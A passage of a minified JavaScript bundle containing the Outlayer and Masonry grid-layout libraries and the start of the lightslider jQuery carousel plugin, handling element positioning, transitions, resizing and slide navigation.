i=t.indexOf(e);-1!=i&&t.splice(i,1)},i.getParent=function(t,i){for(;t.parentNode&&t!=document.body;)if(t=t.parentNode,e(t,i))return t},i.getQueryElement=function(t){return"string"==typeof t?document.querySelector(t):t},i.handleEvent=function(t){var e="on"+t.type;this[e]&&this[e](t)},i.filterFindElements=function(t,n){t=i.makeArray(t);var o=[];return t.forEach(function(t){if(t instanceof HTMLElement){if(!n)return void o.push(t);e(t,n)&&o.push(t);for(var i=t.querySelectorAll(n),r=0;r<i.length;r++)o.push(i[r])}}),o},i.debounceMethod=function(t,e,i){i=i||100;var n=t.prototype[e],o=e+"Timeout";t.prototype[e]=function(){var t=this[o];clearTimeout(t);var e=arguments,r=this;this[o]=setTimeout(function(){n.apply(r,e),delete r[o]},i)}},i.docReady=function(t){var e=document.readyState;"complete"==e||"interactive"==e?setTimeout(t):document.addEventListener("DOMContentLoaded",t)},i.toDashed=function(t){return t.replace(/(.)([A-Z])/g,function(t,e,i){return e+"-"+i}).toLowerCase()};var o=t.console;return i.htmlInit=function(e,n){i.docReady(function(){var r=i.toDashed(n),s="data-"+r,a=document.querySelectorAll("["+s+"]"),h=document.querySelectorAll(".js-"+r),u=i.makeArray(a).concat(i.makeArray(h)),d=s+"-options",l=t.jQuery;u.forEach(function(t){var i,r=t.getAttribute(s)||t.getAttribute(d);try{i=r&&JSON.parse(r)}catch(a){return void(o&&o.error("Error parsing "+s+" on "+t.className+": "+a))}var h=new e(t,i);l&&l.data(t,n,h)})})},i}),function(t,e){"function"==typeof define&&define.amd?define("outlayer/item",["ev-emitter/ev-emitter","get-size/get-size"],e):"object"==typeof module&&module.exports?module.exports=e(require("ev-emitter"),require("get-size")):(t.Outlayer={},t.Outlayer.Item=e(t.EvEmitter,t.getSize_FIX))}(window,function(t,e){"use strict";function i(t){for(var e in t)return!1;return e=null,!0}function n(t,e){t&&(this.element=t,this.layout=e,this.position={x:0,y:0},this._create())}function o(t){return t.replace(/([A-Z])/g,function(t){return"-"+t.toLowerCase()})}var r=document.documentElement.style,s="string"==typeof r.transition?"transition":"WebkitTransition",a="string"==typeof r.transform?"transform":"WebkitTransform",h={WebkitTransition:"webkitTransitionEnd",transition:"transitionend"}[s],u={transform:a,transition:s,transitionDuration:s+"Duration",transitionProperty:s+"Property",transitionDelay:s+"Delay"},d=n.prototype=Object.create(t.prototype);d.constructor=n,d._create=function(){this._transn={ingProperties:{},clean:{},onEnd:{}},this.css({position:"absolute"})},d.handleEvent=function(t){var e="on"+t.type;this[e]&&this[e](t)},d.getSize_FIX=function(){this.size=e(this.element)},d.css=function(t){var e=this.element.style;for(var i in t){var n=u[i]||i;e[n]=t[i]}},d.getPosition=function(){var t=getComputedStyle(this.element),e=this.layout._getOption("originLeft"),i=this.layout._getOption("originTop"),n=t[e?"left":"right"],o=t[i?"top":"bottom"],r=parseFloat(n),s=parseFloat(o),a=this.layout.size;-1!=n.indexOf("%")&&(r=r/100*a.width),-1!=o.indexOf("%")&&(s=s/100*a.height),r=isNaN(r)?0:r,s=isNaN(s)?0:s,r-=e?a.paddingLeft:a.paddingRight,s-=i?a.paddingTop:a.paddingBottom,this.position.x=r,this.position.y=s},d.layoutPosition=function(){var t=this.layout.size,e={},i=this.layout._getOption("originLeft"),n=this.layout._getOption("originTop"),o=i?"paddingLeft":"paddingRight",r=i?"left":"right",s=i?"right":"left",a=this.position.x+t[o];e[r]=this.getXValue(a),e[s]="";var h=n?"paddingTop":"paddingBottom",u=n?"top":"bottom",d=n?"bottom":"top",l=this.position.y+t[h];e[u]=this.getYValue(l),e[d]="",this.css(e),this.emitEvent("layout",[this])},d.getXValue=function(t){var e=this.layout._getOption("horizontal");return this.layout.options.percentPosition&&!e?t/this.layout.size.width*100+"%":t+"px"},d.getYValue=function(t){var e=this.layout._getOption("horizontal");return this.layout.options.percentPosition&&e?t/this.layout.size.height*100+"%":t+"px"},d._transitionTo=function(t,e){this.getPosition();var i=this.position.x,n=this.position.y,o=t==this.position.x&&e==this.position.y;if(this.setPosition(t,e),o&&!this.isTransitioning)return void this.layoutPosition();var r=t-i,s=e-n,a={};a.transform=this.getTranslate(r,s),this.transition({to:a,onTransitionEnd:{transform:this.layoutPosition},isCleaning:!0})},d.getTranslate=function(t,e){var i=this.layout._getOption("originLeft"),n=this.layout._getOption("originTop");return t=i?t:-t,e=n?e:-e,"translate3d("+t+"px, "+e+"px, 0)"},d.goTo=function(t,e){this.setPosition(t,e),this.layoutPosition()},d.moveTo=d._transitionTo,d.setPosition=function(t,e){this.position.x=parseFloat(t),this.position.y=parseFloat(e)},d._nonTransition=function(t){this.css(t.to),t.isCleaning&&this._removeStyles(t.to);for(var e in t.onTransitionEnd)t.onTransitionEnd[e].call(this)},d.transition=function(t){if(!parseFloat(this.layout.options.transitionDuration))return void this._nonTransition(t);var e=this._transn;for(var i in t.onTransitionEnd)e.onEnd[i]=t.onTransitionEnd[i];for(i in t.to)e.ingProperties[i]=!0,t.isCleaning&&(e.clean[i]=!0);if(t.from){this.css(t.from);var n=this.element.offsetHeight;n=null}this.enableTransition(t.to),this.css(t.to),this.isTransitioning=!0};var l="opacity,"+o(a);d.enableTransition=function(){if(!this.isTransitioning){var t=this.layout.options.transitionDuration;t="number"==typeof t?t+"ms":t,this.css({transitionProperty:l,transitionDuration:t,transitionDelay:this.staggerDelay||0}),this.element.addEventListener(h,this,!1)}},d.onwebkitTransitionEnd=function(t){this.ontransitionend(t)},d.onotransitionend=function(t){this.ontransitionend(t)};var c={"-webkit-transform":"transform"};d.ontransitionend=function(t){if(t.target===this.element){var e=this._transn,n=c[t.propertyName]||t.propertyName;if(delete e.ingProperties[n],i(e.ingProperties)&&this.disableTransition(),n in e.clean&&(this.element.style[t.propertyName]="",delete e.clean[n]),n in e.onEnd){var o=e.onEnd[n];o.call(this),delete e.onEnd[n]}this.emitEvent("transitionEnd",[this])}},d.disableTransition=function(){this.removeTransitionStyles(),this.element.removeEventListener(h,this,!1),this.isTransitioning=!1},d._removeStyles=function(t){var e={};for(var i in t)e[i]="";this.css(e)};var f={transitionProperty:"",transitionDuration:"",transitionDelay:""};return d.removeTransitionStyles=function(){this.css(f)},d.stagger=function(t){t=isNaN(t)?0:t,this.staggerDelay=t+"ms"},d.removeElem=function(){this.element.parentNode.removeChild(this.element),this.css({display:""}),this.emitEvent("remove",[this])},d.remove=function(){return s&&parseFloat(this.layout.options.transitionDuration)?(this.once("transitionEnd",function(){this.removeElem()}),void this.hide()):void this.removeElem()},d.reveal=function(){delete this.isHidden,this.css({display:""});var t=this.layout.options,e={},i=this.getHideRevealTransitionEndProperty("visibleStyle");e[i]=this.onRevealTransitionEnd,this.transition({from:t.hiddenStyle,to:t.visibleStyle,isCleaning:!0,onTransitionEnd:e})},d.onRevealTransitionEnd=function(){this.isHidden||this.emitEvent("reveal")},d.getHideRevealTransitionEndProperty=function(t){var e=this.layout.options[t];if(e.opacity)return"opacity";for(var i in e)return i},d.hide=function(){this.isHidden=!0,this.css({display:""});var t=this.layout.options,e={},i=this.getHideRevealTransitionEndProperty("hiddenStyle");e[i]=this.onHideTransitionEnd,this.transition({from:t.visibleStyle,to:t.hiddenStyle,isCleaning:!0,onTransitionEnd:e})},d.onHideTransitionEnd=function(){this.isHidden&&(this.css({display:"none"}),this.emitEvent("hide"))},d.destroy=function(){this.css({position:"",left:"",right:"",top:"",bottom:"",transition:"",transform:""})},n}),function(t,e){"use strict";"function"==typeof define&&define.amd?define("outlayer/outlayer",["ev-emitter/ev-emitter","get-size/get-size","fizzy-ui-utils/utils","./item"],function(i,n,o,r){return e(t,i,n,o,r)}):"object"==typeof module&&module.exports?module.exports=e(t,require("ev-emitter"),require("get-size"),require("fizzy-ui-utils"),require("./item")):t.Outlayer=e(t,t.EvEmitter,t.getSize_FIX,t.fizzyUIUtils,t.Outlayer.Item)}(window,function(t,e,i,n,o){"use strict";function r(t,e){var i=n.getQueryElement(t);if(!i)return void(h&&h.error("Bad element for "+this.constructor.namespace+": "+(i||t)));this.element=i,u&&(this.$element=u(this.element)),this.options=n.extend({},this.constructor.defaults),this.option(e);var o=++l;this.element.outlayerGUID=o,c[o]=this,this._create();var r=this._getOption("initLayout");r&&this.layout()}function s(t){function e(){t.apply(this,arguments)}return e.prototype=Object.create(t.prototype),e.prototype.constructor=e,e}function a(t){if("number"==typeof t)return t;var e=t.match(/(^\d*\.?\d*)(\w*)/),i=e&&e[1],n=e&&e[2];if(!i.length)return 0;i=parseFloat(i);var o=m[n]||1;return i*o}var h=t.console,u=t.jQuery,d=function(){},l=0,c={};r.namespace="outlayer",r.Item=o,r.defaults={containerStyle:{position:"relative"},initLayout:!0,originLeft:!0,originTop:!0,resize:!0,resizeContainer:!0,transitionDuration:"0.4s",hiddenStyle:{opacity:0,transform:"scale(0.001)"},visibleStyle:{opacity:1,transform:"scale(1)"}};var f=r.prototype;n.extend(f,e.prototype),f.option=function(t){n.extend(this.options,t)},f._getOption=function(t){var e=this.constructor.compatOptions[t];return e&&void 0!==this.options[e]?this.options[e]:this.options[t]},r.compatOptions={initLayout:"isInitLayout",horizontal:"isHorizontal",layoutInstant:"isLayoutInstant",originLeft:"isOriginLeft",originTop:"isOriginTop",resize:"isResizeBound",resizeContainer:"isResizingContainer"},f._create=function(){this.reloadItems(),this.stamps=[],this.stamp(this.options.stamp),n.extend(this.element.style,this.options.containerStyle);var t=this._getOption("resize");t&&this.bindResize()},f.reloadItems=function(){this.items=this._itemize(this.element.children)},f._itemize=function(t){for(var e=this._filterFindItemElements(t),i=this.constructor.Item,n=[],o=0;o<e.length;o++){var r=e[o],s=new i(r,this);n.push(s)}return n},f._filterFindItemElements=function(t){return n.filterFindElements(t,this.options.itemSelector)},f.getItemElements=function(){return this.items.map(function(t){return t.element})},f.layout=function(){this._resetLayout(),this._manageStamps();var t=this._getOption("layoutInstant"),e=void 0!==t?t:!this._isLayoutInited;this.layoutItems(this.items,e),this._isLayoutInited=!0},f._init=f.layout,f._resetLayout=function(){this.getSize_FIX()},f.getSize_FIX=function(){this.size=i(this.element)},f._getMeasurement=function(t,e){var n,o=this.options[t];o?("string"==typeof o?n=this.element.querySelector(o):o instanceof HTMLElement&&(n=o),this[t]=n?i(n)[e]:o):this[t]=0},f.layoutItems=function(t,e){t=this._getItemsForLayout(t),this._layoutItems(t,e),this._postLayout()},f._getItemsForLayout=function(t){return t.filter(function(t){return!t.isIgnored})},f._layoutItems=function(t,e){if(this._emitCompleteOnItems("layout",t),t&&t.length){var i=[];t.forEach(function(t){var n=this._getItemLayoutPosition(t);n.item=t,n.isInstant=e||t.isLayoutInstant,i.push(n)},this),this._processLayoutQueue(i)}},f._getItemLayoutPosition=function(){return{x:0,y:0}},f._processLayoutQueue=function(t){this.updateStagger(),t.forEach(function(t,e){this._positionItem(t.item,t.x,t.y,t.isInstant,e)},this)},f.updateStagger=function(){var t=this.options.stagger;return null===t||void 0===t?void(this.stagger=0):(this.stagger=a(t),this.stagger)},f._positionItem=function(t,e,i,n,o){n?t.goTo(e,i):(t.stagger(o*this.stagger),t.moveTo(e,i))},f._postLayout=function(){this.resizeContainer()},f.resizeContainer=function(){var t=this._getOption("resizeContainer");if(t){var e=this._getContainerSize();e&&(this._setContainerMeasure(e.width,!0),this._setContainerMeasure(e.height,!1))}},f._getContainerSize=d,f._setContainerMeasure=function(t,e){if(void 0!==t){var i=this.size;i.isBorderBox&&(t+=e?i.paddingLeft+i.paddingRight+i.borderLeftWidth+i.borderRightWidth:i.paddingBottom+i.paddingTop+i.borderTopWidth+i.borderBottomWidth),t=Math.max(t,0),this.element.style[e?"width":"height"]=t+"px"}},f._emitCompleteOnItems=function(t,e){function i(){o.dispatchEvent(t+"Complete",null,[e])}function n(){s++,s==r&&i()}var o=this,r=e.length;if(!e||!r)return void i();var s=0;e.forEach(function(e){e.once(t,n)})},f.dispatchEvent=function(t,e,i){var n=e?[e].concat(i):i;if(this.emitEvent(t,n),u)if(this.$element=this.$element||u(this.element),e){var o=u.Event(e);o.type=t,this.$element.trigger(o,i)}else this.$element.trigger(t,i)},f.ignore=function(t){var e=this.getItem(t);e&&(e.isIgnored=!0)},f.unignore=function(t){var e=this.getItem(t);e&&delete e.isIgnored},f.stamp=function(t){t=this._find(t),t&&(this.stamps=this.stamps.concat(t),t.forEach(this.ignore,this))},f.unstamp=function(t){t=this._find(t),t&&t.forEach(function(t){n.removeFrom(this.stamps,t),this.unignore(t)},this)},f._find=function(t){return t?("string"==typeof t&&(t=this.element.querySelectorAll(t)),t=n.makeArray(t)):void 0},f._manageStamps=function(){this.stamps&&this.stamps.length&&(this._getBoundingRect(),this.stamps.forEach(this._manageStamp,this))},f._getBoundingRect=function(){var t=this.element.getBoundingClientRect(),e=this.size;this._boundingRect={left:t.left+e.paddingLeft+e.borderLeftWidth,top:t.top+e.paddingTop+e.borderTopWidth,right:t.right-(e.paddingRight+e.borderRightWidth),bottom:t.bottom-(e.paddingBottom+e.borderBottomWidth)}},f._manageStamp=d,f._getElementOffset=function(t){var e=t.getBoundingClientRect(),n=this._boundingRect,o=i(t),r={left:e.left-n.left-o.marginLeft,top:e.top-n.top-o.marginTop,right:n.right-e.right-o.marginRight,bottom:n.bottom-e.bottom-o.marginBottom};return r},f.handleEvent=n.handleEvent,f.bindResize=function(){t.addEventListener("resize",this),this.isResizeBound=!0},f.unbindResize=function(){t.removeEventListener("resize",this),this.isResizeBound=!1},f.onresize=function(){this.resize()},n.debounceMethod(r,"onresize",100),f.resize=function(){this.isResizeBound&&this.needsResizeLayout()&&this.layout()},f.needsResizeLayout=function(){var t=i(this.element),e=this.size&&t;return e&&t.innerWidth!==this.size.innerWidth},f.addItems=function(t){var e=this._itemize(t);return e.length&&(this.items=this.items.concat(e)),e},f.appended=function(t){var e=this.addItems(t);e.length&&(this.layoutItems(e,!0),this.reveal(e))},f.prepended=function(t){var e=this._itemize(t);if(e.length){var i=this.items.slice(0);this.items=e.concat(i),this._resetLayout(),this._manageStamps(),this.layoutItems(e,!0),this.reveal(e),this.layoutItems(i)}},f.reveal=function(t){if(this._emitCompleteOnItems("reveal",t),t&&t.length){var e=this.updateStagger();t.forEach(function(t,i){t.stagger(i*e),t.reveal()})}},f.hide=function(t){if(this._emitCompleteOnItems("hide",t),t&&t.length){var e=this.updateStagger();t.forEach(function(t,i){t.stagger(i*e),t.hide()})}},f.revealItemElements=function(t){var e=this.getItems(t);this.reveal(e)},f.hideItemElements=function(t){var e=this.getItems(t);this.hide(e)},f.getItem=function(t){for(var e=0;e<this.items.length;e++){var i=this.items[e];if(i.element==t)return i}},f.getItems=function(t){t=n.makeArray(t);var e=[];return t.forEach(function(t){var i=this.getItem(t);i&&e.push(i)},this),e},f.remove=function(t){var e=this.getItems(t);this._emitCompleteOnItems("remove",e),e&&e.length&&e.forEach(function(t){t.remove(),n.removeFrom(this.items,t)},this)},f.destroy=function(){var t=this.element.style;t.height="",t.position="",t.width="",this.items.forEach(function(t){t.destroy()}),this.unbindResize();var e=this.element.outlayerGUID;delete c[e],delete this.element.outlayerGUID,u&&u.removeData(this.element,this.constructor.namespace)},r.data=function(t){t=n.getQueryElement(t);var e=t&&t.outlayerGUID;return e&&c[e]},r.create=function(t,e){var i=s(r);return i.defaults=n.extend({},r.defaults),n.extend(i.defaults,e),i.compatOptions=n.extend({},r.compatOptions),i.namespace=t,i.data=r.data,i.Item=s(o),n.htmlInit(i,t),u&&u.bridget&&u.bridget(t,i),i};var m={ms:1,s:1e3};return r.Item=o,r}),function(t,e){"function"==typeof define&&define.amd?define(["outlayer/outlayer","get-size/get-size"],e):"object"==typeof module&&module.exports?module.exports=e(require("outlayer"),require("get-size")):t.Masonry=e(t.Outlayer,t.getSize_FIX)}(window,function(t,e){var i=t.create("masonry");i.compatOptions.fitWidth="isFitWidth";var n=i.prototype;return n._resetLayout=function(){this.getSize_FIX(),this._getMeasurement("columnWidth","outerWidth"),this._getMeasurement("gutter","outerWidth"),this.measureColumns(),this.colYs=[];for(var t=0;t<this.cols;t++)this.colYs.push(0);this.maxY=0,this.horizontalColIndex=0},n.measureColumns=function(){if(this.getContainerWidth(),!this.columnWidth){var t=this.items[0],i=t&&t.element;this.columnWidth=i&&e(i).outerWidth||this.containerWidth}var n=this.columnWidth+=this.gutter,o=this.containerWidth+this.gutter,r=o/n,s=n-o%n,a=s&&1>s?"round":"floor";r=Math[a](r),this.cols=Math.max(r,1)},n.getContainerWidth=function(){var t=this._getOption("fitWidth"),i=t?this.element.parentNode:this.element,n=e(i);this.containerWidth=n&&n.innerWidth},n._getItemLayoutPosition=function(t){t.getSize_FIX();var e=t.size.outerWidth%this.columnWidth,i=e&&1>e?"round":"ceil",n=Math[i](t.size.outerWidth/this.columnWidth);n=Math.min(n,this.cols);for(var o=this.options.horizontalOrder?"_getHorizontalColPosition":"_getTopColPosition",r=this[o](n,t),s={x:this.columnWidth*r.col,y:r.y},a=r.y+t.size.outerHeight,h=n+r.col,u=r.col;h>u;u++)this.colYs[u]=a;return s},n._getTopColPosition=function(t){var e=this._getTopColGroup(t),i=Math.min.apply(Math,e);return{col:e.indexOf(i),y:i}},n._getTopColGroup=function(t){if(2>t)return this.colYs;for(var e=[],i=this.cols+1-t,n=0;i>n;n++)e[n]=this._getColGroupY(n,t);return e},n._getColGroupY=function(t,e){if(2>e)return this.colYs[t];var i=this.colYs.slice(t,t+e);return Math.max.apply(Math,i)},n._getHorizontalColPosition=function(t,e){var i=this.horizontalColIndex%this.cols,n=t>1&&i+t>this.cols;i=n?0:i;var o=e.size.outerWidth&&e.size.outerHeight;return this.horizontalColIndex=o?i+t:this.horizontalColIndex,{col:i,y:this._getColGroupY(i,t)}},n._manageStamp=function(t){var i=e(t),n=this._getElementOffset(t),o=this._getOption("originLeft"),r=o?n.left:n.right,s=r+i.outerWidth,a=Math.floor(r/this.columnWidth);a=Math.max(0,a);var h=Math.floor(s/this.columnWidth);h-=s%this.columnWidth?0:1,h=Math.min(this.cols-1,h);for(var u=this._getOption("originTop"),d=(u?n.top:n.bottom)+i.outerHeight,l=a;h>=l;l++)this.colYs[l]=Math.max(d,this.colYs[l])},n._getContainerSize=function(){this.maxY=Math.max.apply(Math,this.colYs);var t={height:this.maxY};return this._getOption("fitWidth")&&(t.width=this._getContainerFitWidth()),t},n._getContainerFitWidth=function(){for(var t=0,e=this.cols;--e&&0===this.colYs[e];)t++;return(this.cols-t)*this.columnWidth-this.gutter},n.needsResizeLayout=function(){var t=this.containerWidth;return this.getContainerWidth(),t!=this.containerWidth},i});
/*! lightslider - v1.1.6 - 2016-10-25
* https://github.com/sachinchoolur/lightslider */
!function(a,b){"use strict";var c={item:3,autoWidth:!1,slideMove:1,slideMargin:10,addClass:"",mode:"slide",useCSS:!0,cssEasing:"ease",easing:"linear",speed:400,auto:!1,pauseOnHover:!1,loop:!1,slideEndAnimation:!0,pause:2e3,keyPress:!1,controls:!0,prevHtml:"",nextHtml:"",rtl:!1,adaptiveHeight:!1,vertical:!1,verticalHeight:500,vThumbWidth:100,thumbItem:10,pager:!0,gallery:!1,galleryMargin:5,thumbMargin:5,currentPagerPosition:"middle",enableTouch:!0,enableDrag:!0,freeMove:!0,swipeThreshold:40,responsive:[],onBeforeStart:function(a){},onSliderLoad:function(a){},onBeforeSlide:function(a,b){},onAfterSlide:function(a,b){},onBeforeNextSlide:function(a,b){},onBeforePrevSlide:function(a,b){}};a.fn.lightSlider=function(b){if(0===this.length)return this;if(this.length>1)return this.each(function(){a(this).lightSlider(b)}),this;var d={},e=a.extend(!0,{},c,b),f={},g=this;d.$el=this,"fade"===e.mode&&(e.vertical=!1);var h=g.children(),i=a(window).width(),j=null,k=null,l=0,m=0,n=!1,o=0,p="",q=0,r=e.vertical===!0?"height":"width",s=e.vertical===!0?"margin-bottom":"margin-right",t=0,u=0,v=0,w=0,x=null,y="ontouchstart"in document.documentElement,z={};return z.chbreakpoint=function(){if(i=a(window).width(),e.responsive.length){var b;if(e.autoWidth===!1&&(b=e.item),i<e.responsive[0].breakpoint)for(var c=0;c<e.responsive.length;c++)i<e.responsive[c].breakpoint&&(j=e.responsive[c].breakpoint,k=e.responsive[c]);if("undefined"!=typeof k&&null!==k)for(var d in k.settings)k.settings.hasOwnProperty(d)&&(("undefined"==typeof f[d]||null===f[d])&&(f[d]=e[d]),e[d]=k.settings[d]);if(!a.isEmptyObject(f)&&i>e.responsive[0].breakpoint)for(var g in f)f.hasOwnProperty(g)&&(e[g]=f[g]);e.autoWidth===!1&&t>0&&v>0&&b!==e.item&&(q=Math.round(t/((v+e.slideMargin)*e.slideMove)))}},z.calSW=function(){e.autoWidth===!1&&(v=(o-(e.item*e.slideMargin-e.slideMargin))/e.item)},z.calWidth=function(a){var b=a===!0?p.find(".lslide").length:h.length;if(e.autoWidth===!1)m=b*(v+e.slideMargin);else{m=0;for(var c=0;b>c;c++)m+=parseInt(h.eq(c).width())+e.slideMargin}return m},d={doCss:function(){var a=function(){for(var a=["transition","MozTransition","WebkitTransition","OTransition","msTransition","KhtmlTransition"],b=document.documentElement,c=0;c<a.length;c++)if(a[c]in b.style)return!0};return e.useCSS&&a()?!0:!1},keyPress:function(){e.keyPress&&a(document).on("keyup.lightslider",function(b){a(":focus").is("input, textarea")||(b.preventDefault?b.preventDefault():b.returnValue=!1,37===b.keyCode?g.goToPrevSlide():39===b.keyCode&&g.goToNextSlide())})},controls:function(){e.controls&&(g.after('<div class="lSAction"><a class="lSPrev">'+e.prevHtml+'</a><a class="lSNext">'+e.nextHtml+"</a></div>"),e.autoWidth?z.calWidth(!1)<o&&p.find(".lSAction").hide():l<=e.item&&p.find(".lSAction").hide(),p.find(".lSAction a").on("click",function(b){return b.preventDefault?b.preventDefault():b.returnValue=!1,"lSPrev"===a(this).attr("class")?g.goToPrevSlide():g.goToNextSlide(),!1}))},initialStyle:function(){var a=this;"fade"===e.mode&&(e.autoWidth=!1,e.slideEndAnimation=!1),e.auto&&(e.slideEndAnimation=!1),e.autoWidth&&(e.slideMove=1,e.item=1),e.loop&&(e.slideMove=1,e.freeMove=!1),e.onBeforeStart.call(this,g),z.chbreakpoint(),g.addClass("lightSlider").wrap('<div class="lSSlideOuter '+e.addClass+'"><div class="lSSlideWrapper"></div></div>'),p=g.parent(".lSSlideWrapper"),e.rtl===!0&&p.parent().addClass("lSrtl"),e.vertical?(p.parent().addClass("vertical"),o=e.verticalHeight,p.css("height",o+"px")):o=g.outerWidth(),h.addClass("lslide"),e.loop===!0&&"slide"===e.mode&&(z.calSW(),z.clone=function(){if(z.calWidth(!0)>o){for(var b=0,c=0,d=0;d<h.length&&(b+=parseInt(g.find(".lslide").eq(d).width())+e.slideMargin,c++,!(b>=o+e.slideMargin));d++);var f=e.autoWidth===!0?c:e.item;if(f<g.find(".clone.left").length)for(var i=0;i<g.find(".clone.left").length-f;i++)h.eq(i).remove();if(f<g.find(".clone.right").length)for(var j=h.length-1;j>h.length-1-g.find(".clone.right").length;j--)q--,h.eq(j).remove();for(var k=g.find(".clone.right").length;f>k;k++)g.find(".lslide").eq(k).clone().removeClass("lslide").addClass("clone right").appendTo(g),q++;for(var l=g.find(".lslide").length-g.find(".clone.left").length;l>g.find(".lslide").length-f;l--)g.find(".lslide").eq(l-1).clone().removeClass("lslide").addClass("clone left").prependTo(g);h=g.children()}else h.hasClass("clone")&&(g.find(".clone").remove(),a.move(g,0))},z.clone()),z.sSW=function(){l=h.length,e.rtl===!0&&e.vertical===!1&&(s="margin-left"),e.autoWidth===!1&&h.css(r,v+"px"),h.css(s,e.slideMargin+"px"),m=z.calWidth(!1),g.css(r,m+"px"),e.loop===!0&&"slide"===e.mode&&n===!1&&(q=g.find(".clone.left").length)},z.calL=function(){h=g.children(),l=h.length},this.doCss()&&p.addClass("usingCss"),z.calL(),"slide"===e.mode?(z.calSW(),z.sSW(),e.loop===!0&&(t=a.slideValue(),this.move(g,t)),e.vertical===!1&&this.setHeight(g,!1)):(this.setHeight(g,!0),g.addClass("lSFade"),this.doCss()||(h.fadeOut(0),h.eq(q).fadeIn(0))),e.loop===!0&&"slide"===e.mode?h.eq(q).addClass("active"):h.first().addClass("active")},pager:function(){var a=this;if(z.createPager=function(){w=(o-(e.thumbItem*e.thumbMargin-e.thumbMargin))/e.thumbItem;var b=p.find(".lslide"),c=p.find(".lslide").length,d=0,f="",h=0;for(d=0;c>d;d++){"slide"===e.mode&&(e.autoWidth?h+=(parseInt(b.eq(d).width())+e.slideMargin)*e.slideMove:h=d*(v+e.slideMargin)*e.slideMove);var i=b.eq(d*e.slideMove).attr("data-thumb");if(f+=e.gallery===!0?'<li style="width:100%;'+r+":"+w+"px;"+s+":"+e.thumbMargin+'px"><a href="#"><img src="'+i+'" /></a></li>':'<li><a href="#">'+(d+1)+"</a></li>","slide"===e.mode&&h>=m-o-e.slideMargin){d+=1;var j=2;e.autoWidth&&(f+='<li><a href="#">'+(d+1)+"</a></li>",j=1),j>d?(f=null,p.parent().addClass("noPager")):p.parent().removeClass("noPager");break}}var k=p.parent();k.find(".lSPager").html(f),e.gallery===!0&&(e.vertical===!0&&k.find(".lSPager").css("width",e.vThumbWidth+"px"),u=d*(e.thumbMargin+w)+.5,k.find(".lSPager").css({property:u+"px","transition-duration":e.speed+"ms"}),e.vertical===!0&&p.parent().css("padding-right",e.vThumbWidth+e.galleryMargin+"px"),k.find(".lSPager").css(r,u+"px"));var l=k.find(".lSPager").find("li");l.first().addClass("active"),l.on("click",function(){return e.loop===!0&&"slide"===e.mode?q+=l.index(this)-k.find(".lSPager").find("li.active").index():q=l.index(this),g.mode(!1),e.gallery===!0&&a.slideThumb(),!1})},e.pager){var b="lSpg";e.gallery&&(b="lSGallery"),p.after('<ul class="lSPager '+b+'"></ul>');var c=e.vertical?"margin-left":"margin-top";p.parent().find(".lSPager").css(c,e.galleryMargin+"px"),z.createPager()}setTimeout(function(){z.init()},0)},setHeight:function(a,b){var c=null,d=this;c=e.loop?a.children(".lslide ").first():a.children().first();var f=function(){var d=c.outerHeight(),e=0,f=d;b&&(d=0,e=100*f/o),a.css({height:d+"px","padding-bottom":e+"%"})};f(),c.find("img").length?c.find("img")[0].complete?(f(),x||d.auto()):c.find("img").on("load",function(){setTimeout(function(){f(),x||d.auto()},100)}):x||d.auto()},active:function(a,b){this.doCss()&&"fade"===e.mode&&p.addClass("on");var c=0;if(q*e.slideMove<l){a.removeClass("active"),this.doCss()||"fade"!==e.mode||b!==!1||a.fadeOut(e.speed),c=b===!0?q:q*e.slideMove;var d,f;b===!0&&(d=a.length,f=d-1,c+1>=d&&(c=f)),e.loop===!0&&"slide"===e.mode&&(c=b===!0?q-g.find(".clone.left").length:q*e.slideMove,b===!0&&(d=a.length,f=d-1,c+1===d?c=f:c+1>d&&(c=0))),this.doCss()||"fade"!==e.mode||b!==!1||a.eq(c).fadeIn(e.speed),a.eq(c).addClass("active")}else a.removeClass("active"),a.eq(a.length-1).addClass("active"),this.doCss()||"fade"!==e.mode||b!==!1||(a.fadeOut(e.speed),a.eq(c).fadeIn(e.speed))},move:function(a,b){e.rtl===!0&&(b=-b),this.doCss()?a.css(e.vertical===!0?{transform:"translate3d(0px, "+-b+"px, 0px)","-webkit-transform":"translate3d(0px, "+-b+"px, 0px)"}:{transform:"translate3d("+-b+"px, 0px, 0px)","-webkit-transform":"translate3d("+-b+"px, 0px, 0px)"}):e.vertical===!0?a.css("position","relative").animate({top:-b+"px"},e.speed,e.easing):a.css("position","relative").animate({left:-b+"px"},e.speed,e.easing);var c=p.parent().find(".lSPager").find("li");this.active(c,!0)},fade:function(){this.active(h,!1);var a=p.parent().find(".lSPager").find("li");this.active(a,!0)},slide:function(){var a=this;z.calSlide=function(){m>o&&(t=a.slideValue(),a.active(h,!1),t>m-o-e.slideMargin?t=m-o-e.slideMargin:0>t&&(t=0),a.move(g,t),e.loop===!0&&"slide"===e.mode&&(q>=l-g.find(".clone.left").length/e.slideMove&&a.resetSlide(g.find(".clone.left").length),0===q&&a.resetSlide(p.find(".lslide").length)))},z.calSlide()},resetSlide:function(a){var b=this;p.find(".lSAction a").addClass("disabled"),setTimeout(function(){q=a,p.css("transition-duration","0ms"),t=b.slideValue(),b.active(h,!1),d.move(g,t),setTimeout(function(){p.css("transition-duration",e.speed+"ms"),p.find(".lSAction a").removeClass("disabled")},50)},e.speed+100)},slideValue:function(){var a=0;if(e.autoWidth===!1)a=q*(v+e.slideMargin)*e.slideMove;else{a=0;for(var b=0;q>b;b++)a+=parseInt(h.eq(b).width())+e.slideMargin}return a},slideThumb:function(){var a;switch(e.currentPagerPosition){case"left":a=0;break;case"middle":a=o/2-w/2;break;case"right":a=o-w}var b=q-g.find(".clone.left").length,c=p.parent().find(".lSPager");"slide"===e.mode&&e.loop===!0&&(b>=c.children().length?b=0:0>b&&(b=c.children().length));var d=b*(w+e.thumbMargin)-a;d+o>u&&(d=u-o-e.thumbMargin),0>d&&(d=0),this.move(c,d)},auto:function(){e.auto&&(clearInterval(x),x=setInterval(function(){g.goToNextSlide()},e.pause))},pauseOnHover:function(){var b=this;e.auto&&e.pauseOnHover&&(p.on("mouseenter",function(){a(this).addClass("ls-hover"),g.pause(),e.auto=!0}),p.on("mouseleave",function(){a(this).removeClass("ls-hover"),p.find(".lightSlider").hasClass("lsGrabbing")||b.auto()}))},touchMove:function(a,b){if(p.css("transition-duration","0ms"),"slide"===e.mode){var c=a-b,d=t-c;if(d>=m-o-e.slideMargin)if(e.freeMove===!1)d=m-o-e.slideMargin;else{var f=m-o-e.slideMargin;d=f+(d-f)/5}else 0>d&&(e.freeMove===!1?d=0:d/=5);this.move(g,d)}},touchEnd:function(a){if(p.css("transition-duration",e.speed+"ms"),"slide"===e.mode){var 